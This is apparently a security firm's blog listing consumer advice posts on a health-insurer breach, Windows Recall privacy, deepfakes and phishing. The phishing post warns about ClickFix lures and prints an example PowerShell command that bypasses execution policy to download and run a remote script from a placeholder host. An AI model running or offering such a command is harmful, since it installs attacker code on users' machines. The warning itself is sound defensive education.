Experiencing a Breach?
1-877-353-8352

Blue Shield CA Data Breach: Protecting Your Information

Anthony Duran on May 8, 2025

On April 9, Blue Shield of California disclosed a potential data breach that involved member’s data being shared through Google Ads. Blue Shield has noted the following as affected:  

“Insurance plan name, type and group number; city; zip code; gender; family size; Blue Shield assigned identifiers for members’ online accounts; medical claim service date and service provider, patient name, and patient financial responsibility; and “Find a Doctor” search criteria and results (location, plan name and type, provider name and type).” 

 Blue Shield has confirmed that no other information was given like Social Security numbers or driver’s license numbers.  

The recent data breach at Blue Shield of California has raised concerns about the security of personal health data. If you’re a Blue Shield member or concerned about how such breaches can impact your security, please take a moment to read some safety precautions you can take.  

Stay Informed

The first step after any data breach is to stay informed. Blue Shield has been notifying members about the breach and what information was exposed. Keep an eye on emails or web updates from the company to understand the scope of the incident and what actions they are taking to mitigate the risks. 

Monitor Your Medical Records

It’s important to regularly review your medical records for any unfamiliar treatments or services that could signal fraudulent claims. By checking your Explanation of Benefits (EOB) statements, you can spot any suspicious activity early and report it to your provider.

Use Identity Monitoring Services

In the aftermath of a breach, many companies offer free credit and identity monitoring. Take advantage of these services to monitor any unusual activity tied to your personal data, including medical identity theft or misuse of your Social Security number. LifeLock by Norton is the most popular service for identity theft protection. There are several other companies that offer similar services like Guardio, IDShield, and Identity Force 

Freeze Your Credit

If you’re concerned about potential identity theft, freezing your credit with major credit bureaus (Equifax, Experian, etc.) can help prevent fraudulent account creation and use.  

Strengthening Your Online Security

After a breach, it’s a good idea to update your passwords and use two-factor authentication wherever possible. This added layer of security can help protect your accounts from unauthorized access. Be wary of phishing emails that may attempt to trick you into sharing sensitive information. This is especially important after a breach like this one as scammers may be trying to take advantage of the situation.  

See our guide on setting up 2FA for more help.   

File a Complaint if Necessary

If you feel that your data hasn’t been properly protected, you can file a complaint with the Department of Health and Human Services Office for Civil Rights or your state’s attorney general. It’s essential to hold organizations accountable for protecting your personal data. 

AI Could be Taking More Than it is Giving

Anthony Duran on May 7, 2025

What is Recall?

Microsoft first introduced Copilot’s Recall feature in May 2024 with the launch of Copilot+ PCs. Recall automatically captures encrypted snapshots of your screen every few seconds, allowing you to search your on-screen history using more colloquial language.

Retrace your steps with Recall

Credit: Microsoft 

The data stays local on your device. After privacy concerns, Microsoft officially released Recall in April 2025 with improvements, including making Recall disabled by default which gives users more control over their involvement.  

Security Concerns

Copilot’s Recall functionality is a great tool that can help many people; however, it is inherently dangerous to cyber and personal security. Apps like Signal, known for their safety by having disappearing messages, could be obsolete if even one of the users in a conversation has Recall since it can store sensitive information even after it is deleted from Signal.  

Even if you opt out of Recall, whoever you are communicating with could be opted in, and your conversations or information shared could be stored, even after you delete them. Conversations will no longer be gone when deleted, but instead are saved to the opted-in user’s storage. Moreover, there is no notification that Recall is storing the information of a user (opted out) who is engaged in a conversation with another user who is using Recall.  

Be cautious of what you share. It has been a common practice to be careful of what you share on the internet since its dawn, but now it could be more important than ever as even trusted people could inadvertently capture your information. Recall could still be a risk for someone who has opted out through daily conversations. As of now, the only way for Recall to not store information is for both parties to opt out. 

Opting Out

Copilot’s Recall was re-released on the latest Windows 11 24h2 update (KB055627). Recall is only available on Copilot+ PCs. If you do not have a Copilot+ PC you do not have to worry about having Recall yet, but you will have to be wary about those who have a Copilot+ PC and have installed the newest update for Windows.  

If you do have a Copilot+ PC and want to opt out, follow these steps:  

Go to Settings > Privacy & security > Recall & snapshots. When you have navigated here, simply toggling it off. 

If you want to keep it but only want it off for a day, you can easily pause Recall by selecting the Recall icon in your system tray and selecting the pause option.  

The Deepfake Dilemma: Rising Threats and How to Stay Protected

Anthony Duran on April 29, 2025

Deepfakes, AI-generated audio, video, or images designed to mimic real people, have quickly evolved from experimental curiosities into dangerous tools for deception. As technology continues to advance, so does the ability for malicious actors to weaponize deepfakes for fraud, misinformation, and personal attacks. In 2025, the deepfake landscape presents serious challenges across personal, professional, and political arenas. 

How Deepfakes are Made

Deepfakes are created using artificial intelligence, specifically deep learning models like autoencoders or generative adversarial networks (GANs). The process starts by training these models on large datasets of photos and videos of a person, allowing the AI to learn facial expressions, movements, and voice patterns. Once trained, the model can generate realistic but fake content by swapping faces in videos or mimicking voices. After the initial creation, post-processing techniques help enhance realism, such as smoothing artifacts (noticeable errors like 4 or 6 fingers or unnatural twitches) and syncing lip movements. Common software used to make deepfakes includes DeepFaceLab, Faceswap, Avatarify, and voice cloning tools like Descript’s Overdub. While these tools can be used creatively in entertainment or education, they also raise serious concerns around misinformation and impersonation.  

This is an example of a deepfake side by side comparison.  

The Growing Impact of Deepfakes

Victims of deepfakes, particularly women and minors,* are increasingly targeted with explicit or defamatory content. These fabricated videos can cause severe emotional distress, social stigma, and career harm, even when the content is proven false. Criminals are also using deepfakes to impersonate executives and trick employees into transferring money or divulging sensitive information. A commonly known deepfake scam happened last year as criminals exploited a company approximately $25 million USD 

*Read more about why women and minors are targeted more than other demographics. 

Video conferencing tools and voice messaging platforms are now common channels for these scams, which can cause massive financial losses. In the political sphere, deepfakes of public figures are being used to spread false narratives and incite unrest. As these videos go viral on social media, they erode public trust, manipulate public opinion, and undermine democratic processes.  

Protecting Against Deepfake Threats

To protect against these threats, it is important to verify content before sharing. One quick way to check is looking at the URL. Authenticity should never be assumed. Always check for inconsistencies in movement, lighting, or speech patterns and cross-reference information with trusted news outlets or official sources. AI-powered detection tools can also be used to identify deepfakes, analyzing digital fingerprints, facial patterns, and audio signals for manipulation. Limiting personal exposure online is another effective measure. Reducing the availability of personal photos, videos, and voice recordings by adjusting privacy settings can help limit the data that deepfake creators rely on.  

It is important to understand the legal tools that are available as more states are introducing legislation to combat deepfakes. In an effort to defend against deepfakes, New Jersey passed legislation in April 2025 against “deceptive media made with artificial intelligence”. This is not long after California’s AB2655, which helps defend against deepfak es in the political setting. 

Moving Forward in the Deepfake Era

Deepfakes will continue to improve in quality and accessibility, making detection and prevention more difficult. A combination of legal protections, public awareness, and evolving technology will be essential in managing this growing threat. Digital literacy and critical thinking are more important than ever. Understanding how deepfakes are made and used can empower individuals and organizations to better protect themselves and others from the harm they may cause.

The Rise of Advanced Phishing Scams and How to Stay Safe

Anthony Duran on March 21, 2025

Phishing attacks continue to evolve as cybercriminals develop new techniques to deceive users and steal sensitive information. One emerging method is ClickFix, a social engineering tactic that tricks users into executing malicious commands by disguising them as legitimate actions, such as CAPTCHA verifications or system fixes. Attackers use phishing emails and malicious ads to direct victims to deceptive websites, where clipboard manipulation convinces a victim to copy a command that runs a malicious script, often using built-in system tools like PowerShell or Command Prompt, to download and execute malware, steal credentials, or establish persistent access.  Recent campaigns have used ClickFix to distribute malware like Lumma Stealer, DarkGate, and remote access trojans. 

Another growing phishing scam is the QR code phishing attack, often referred to as “Quishing”  Cybercriminals embed QR codes in phishing emails, pretending to be from trusted sources like banks, delivery services, or corporate IT departments. When users scan these QR codes with their smartphones, they are redirected to fake login pages that steal their credentials. Since mobile devices do not always display full URLs, users may not realize they are on a malicious site until their information has already been compromised. 

How to Stay Safe

With phishing attacks becoming more sophisticated, it is essential to take proactive steps to protect yourself and your organization. Here are a few recommendations:

    • Always verify the source of an email before clicking on links or scanning QR codes. If something seems suspicious, contact the sender through official channels. This can be done through emailing the person or service directly asking for confirmation or through another trusted form of communication, before acting. 
    • Do not run commands provided by unknown sources, even if they appear to be part of a system fix or security verification. For example: 
      powershell -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://malicious.com/script.ps1’)”  
      could be inserted through three steps
       
      1.   ⊞ +R  
      2.   CTRL+V 
      3.   Enter 
    • Enable multi-factor authentication (MFA) on all accounts to add an extra layer of security against credential theft. Check out our guide on setting up 2FA (Two-Factor Authentication) for various email services.  
    • Keep software and security tools updated to detect and block phishing attempts before they cause harm. 
    • Educate employees and team members about common phishing tactics to reduce the risk of falling for social engineering scams. 

By staying informed and vigilant, individuals and businesses can significantly reduce the likelihood of becoming victims of phishing scams. The most effective way to avoid a scam is to ask yourself three questions, Is this urgent? Is this unexpected? Is this too good to be true? These three questions will help save you time and stress from being a victim of a scam 

A Cyber Threat: US Water Systems Under Attack

Anthony Duran on March 22, 2024

California municipalities have been increasingly targeted by ransomware and malware attacks since the beginning of 2023, and while some attacks have been less serious, others have temporarily crippled municipalities and police departments.

Oakley California Ransomware Attack

Anthony Duran on March 8, 2024

California municipalities have been increasingly targeted by ransomware and malware attacks since the beginning of 2023, and while some attacks have been less serious, others have temporarily crippled municipalities and police departments.

company

headquarters

sign up for our newsletter

ⓒ 2025 horizon helix, All rights reserved
Linkedin-in